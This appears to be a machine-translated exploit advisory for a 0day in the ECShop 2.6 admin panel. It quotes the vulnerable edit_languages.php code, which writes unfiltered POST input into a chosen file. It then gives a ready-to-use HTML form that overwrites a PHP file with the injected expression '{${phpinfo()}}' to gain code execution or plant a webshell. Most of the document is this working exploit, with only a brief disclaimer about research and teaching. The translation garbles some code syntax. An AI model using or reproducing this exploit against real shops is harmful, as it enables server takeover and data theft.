ecshop background write shell 0day-vulnerability warning-the black bar safety net

2010-12-28T00:00:00
ID MYHACK58:62201028705
Type myhack58
Reporter 佚名
Modified 2010-12-28T00:00:00

Description

Author: xhm1n9[ESST] EMail:xhm1n9@0x70.com Site: http://www.x-xox-x.net Date: 2010-12-27 1 0:2 2:1 5 From: http://x-xox-x.net/exploit/11

3 month stuff now. adminedit_languages.php

The relevant variable is not filtered!

elseif ($_REQUEST['act'] == 'edit') { / Language items of the path / $lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : ";

/ Before replacement of the language of the item / $src_items = ! empty($_POST['item']) ? stripslashes_deep($_POST['item']) : ";

/ Modify the following language items / $dst_items = array(); $_POST['item_id'] = stripslashes_deep($_POST['item_id']);

for ($i = 0; $i < count($_POST['item_id']); $i++) { / Language content if it is empty, do not modify / if (trim($_POST['item_content'][$i]) == ") { unset($src_items[$i]); } else { $_POST['item_content'][$i] = str_replace('\\n', '\n', $_POST['item_content'][$i]); $dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$ _POST['item_content'][$i]. '";'; } }

/ Call the function to edit language item / $result = set_language_items($lang_file, $src_items, $dst_items);

if ($result === false) { / Modify failure message / $link[] = array('text' => $_LANG['back_list'], 'href' => 'javascript:history. back(-1)'); sys_msg($_LANG['edit_languages_false'], 0, $link); }

........................................ function set_language_items($file_path, $src_items, $dst_items) { /* Check whether the file can be written. * / if (file_mode_info($file_path) < 2) { return false; }

/ Get file contents / $line_array = file($file_path); if (!$ line_array) { return false; } else { $file_content = implode(", $line_array); }

$snum = count($src_items); $dnum = count($dst_items); if ($snum != $dnum) { return false; } / The index to sort, to prevent the dislocation of the replacement / ksort($src_items); ksort($dst_items); for ($i = 0; $i < $snum; $i++) { $file_content = str_replace($src_items[$i], $dst_items[$i], $file_content);

}

/ Write the revised language items / $f = fopen($file_path, 'wb'); if (!$ f) { return false; } if (! fwrite($f, $file_content)) { return false; } else { return true; } } Copy the code Test method: [www.x-xox-x.net] This site provides program(method)may carry offensive,for security research and teaching purposes,at your own risk! <title>ecshop 2.6 background to get a shell by:xhm1n9</title> <form name="searchForm" action="http://127.1/ecshop2.6/admin/edit_languages.php" method="post"> File:<input type="text" name="file_path" size="3 6" value="../xx.php" /><br>to any php file Keywords: <input type="text" name="item" size="3 for 2" value="" /><br>the selected file in the content Injected statement:<input type="text" name="item_content[]" size="3 0" value="{${phpinfo()}}" /><br>to replace the horse <input type="hidden" name="item_id" size="3 0" value="0" /><br> <input type="submit" value=" Search " class="button" /> <input type="hidden" name="act" value="edit" /> </form>